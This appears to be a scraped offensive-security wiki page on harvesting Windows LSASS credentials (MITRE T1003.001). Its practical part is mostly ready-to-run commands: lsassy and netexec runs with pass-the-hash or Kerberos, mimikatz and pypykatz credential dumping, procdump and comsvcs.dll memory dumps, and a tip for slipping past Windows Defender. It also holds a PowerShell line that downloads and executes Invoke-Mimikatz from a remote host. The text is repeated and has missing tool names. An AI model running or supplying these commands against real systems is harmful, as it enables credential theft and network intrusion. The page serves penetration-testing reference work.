LSASS secrets

MITRE ATT&CK™ Sub-technique T1003.001

Last updated 1 year ago

Was this helpful?

Theory

The Local Security Authority Subsystem Service (LSASS) is a Windows service responsible for enforcing the security policy on the system. It verifies users logging in, handles password changes and creates access tokens. Those operations lead to the storage of credential material in the process memory of LSASS. With administrative rights only, this material can be harvested (either locally or remotely).

Practice

(Python) can be used to remotely extract credentials, from LSASS, on multiple hosts. As of today (22/07/2020), it is the Rolls-Royce of remote lsass credential harvesting.

several dumping methods: comsvcs.dll, ,
several authentication methods: like (NTLM), or (Kerberos)
it can be used either as a standalone script, as a module or as a Python library
it can interact with a Neo4j database to set targets as "owned"

# With pass-the-hash (NTLM)
lsassy -u $USER -H $NThash $TARGETS

# With plaintext credentials
lsassy -d $DOMAIN -u $USER -H $NThash $TARGETS

# With pass-the-ticket (Kerberos)
lsassy -k $TARGETS

# netexec Module examples
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
netexec smb $TARGETS -k -M lsassy
netexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd

can be used locally to extract credentials with from lsass's process memory, or remotely with to analyze a memory dump (dumped with for example).

# (Locally) extract credentials from LSASS process memory
sekurlsa::logonpasswords

# (Remotely) analyze a memory dump
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

For Windows 2000, a special version of mimikatz called mimilove can be used.

pypykatz lsa minidump lsass.dmp

procdump -accepteula -ma lsass lsass.dmp

Windows Defender is triggered when a memory dump of lsass is operated, quickly leading to the deletion of the dump. Using lsass's process identifier (pid) "bypasses" that.

# Find lsass's pid
tasklist /fi "imagename eq lsass.exe"

# Dump lsass's process memory
procdump -accepteula -ma $lsass_pid lsass.dmp

The native comsvcs.dll DLL found in C:\Windows\system32 can be used with rundll32 to dump LSASS's process memory.

# Find lsass's pid
tasklist /fi "imagename eq lsass.exe"

# Dump lsass's process memory
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.dmp full

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds

Theory

Practice

(Python) can be used to remotely extract credentials, from LSASS, on multiple hosts. As of today (22/07/2020), it is the Rolls-Royce of remote lsass credential harvesting.

several dumping methods: comsvcs.dll, ,
several authentication methods: like (NTLM), or (Kerberos)
it can be used either as a standalone script, as a module or as a Python library
it can interact with a Neo4j database to set targets as "owned"

# With pass-the-hash (NTLM)
lsassy -u $USER -H $NThash $TARGETS

# With plaintext credentials
lsassy -d $DOMAIN -u $USER -H $NThash $TARGETS

# With pass-the-ticket (Kerberos)
lsassy -k $TARGETS

# netexec Module examples
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
netexec smb $TARGETS -k -M lsassy
netexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd

can be used locally to extract credentials with from lsass's process memory, or remotely with to analyze a memory dump (dumped with for example).

# (Locally) extract credentials from LSASS process memory
sekurlsa::logonpasswords

# (Remotely) analyze a memory dump
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

For Windows 2000, a special version of mimikatz called mimilove can be used.

(Python) can be used remotely (i.e. offline) to analyze a memory dump (dumped with for example).

pypykatz lsa minidump lsass.dmp

The legitimate tool (from ) () can be used to dump lsass's process memory.

procdump -accepteula -ma lsass lsass.dmp

Windows Defender is triggered when a memory dump of lsass is operated, quickly leading to the deletion of the dump. Using lsass's process identifier (pid) "bypasses" that.

# Find lsass's pid
tasklist /fi "imagename eq lsass.exe"

# Dump lsass's process memory
procdump -accepteula -ma $lsass_pid lsass.dmp

Once the memory dump is finished, it can be analyzed with (Windows) or (Python, cross-platform).

The native comsvcs.dll DLL found in C:\Windows\system32 can be used with rundll32 to dump LSASS's process memory.

# Find lsass's pid
tasklist /fi "imagename eq lsass.exe"

# Dump lsass's process memory
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.dmp full

's exfiltration script (PowerShell) can be used to extract credential material from LSASS's process memory.

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds

Recovered credential material could be either plaintext passwords or NT hash that can be used with (depending on the context).

LSASS secrets

LSASS secrets

Theory

Practice

Resources

Theory

Practice

Resources